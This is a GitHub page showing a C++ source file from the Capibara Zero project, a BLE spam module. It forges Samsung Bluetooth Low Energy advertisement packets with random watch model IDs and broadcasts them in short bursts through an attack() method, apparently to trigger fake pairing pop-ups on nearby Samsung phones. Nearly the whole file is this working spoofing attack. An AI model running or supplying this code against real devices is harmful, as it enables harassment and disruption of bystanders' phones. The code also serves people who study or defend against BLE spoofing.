-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathsamsung_ble_spam.cpp
69 lines (60 loc) · 2.01 KB
/
samsung_ble_spam.cpp
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
/*
* This file is part of the Capibara zero project(https://capibarazero.github.io/).
* Copyright (c) 2023 Andrea Canale.
* Copyright (c) 2023 Spooks4576
*
* This program is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, version 3.
*
* This program is distributed in the hope that it will be useful, but
* WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program. If not, see <http://www.gnu.org/licenses/>.
*/
#include "samsung_ble_spam.hpp"
SamsungBleSpam::SamsungBleSpam()
{
pServer = NimBLEDevice::createServer();
pAdvertising = pServer->getAdvertising();
}
SamsungBleSpam::~SamsungBleSpam()
{
pServer->stopAdvertising();
}
NimBLEAdvertisementData SamsungBleSpam::getOAdvertisementData()
{
NimBLEAdvertisementData randomAdvertisementData = NimBLEAdvertisementData();
uint8_t packet[15];
uint8_t i = 0;
uint8_t model = watch_models[rand() % 25].value;
packet[i++] = 15; // Size
packet[i++] = 0xFF; // AD Type (Manufacturer Specific)
packet[i++] = 0x75; // Company ID (Samsung Electronics Co. Ltd.)
packet[i++] = 0x00; // ...
packet[i++] = 0x01;
packet[i++] = 0x00;
packet[i++] = 0x02;
packet[i++] = 0x00;
packet[i++] = 0x01;
packet[i++] = 0x01;
packet[i++] = 0xFF;
packet[i++] = 0x00;
packet[i++] = 0x00;
packet[i++] = 0x43;
packet[i++] = (model >> 0x00) & 0xFF; // Watch Model / Color (?)
randomAdvertisementData.addData(std::string((char *)packet, 15));
return randomAdvertisementData;
}
void SamsungBleSpam::attack()
{
delay(40);
NimBLEAdvertisementData advertisementData = getOAdvertisementData();
pAdvertising->setAdvertisementData(advertisementData);
pAdvertising->start();
delay(20);
pAdvertising->stop();
}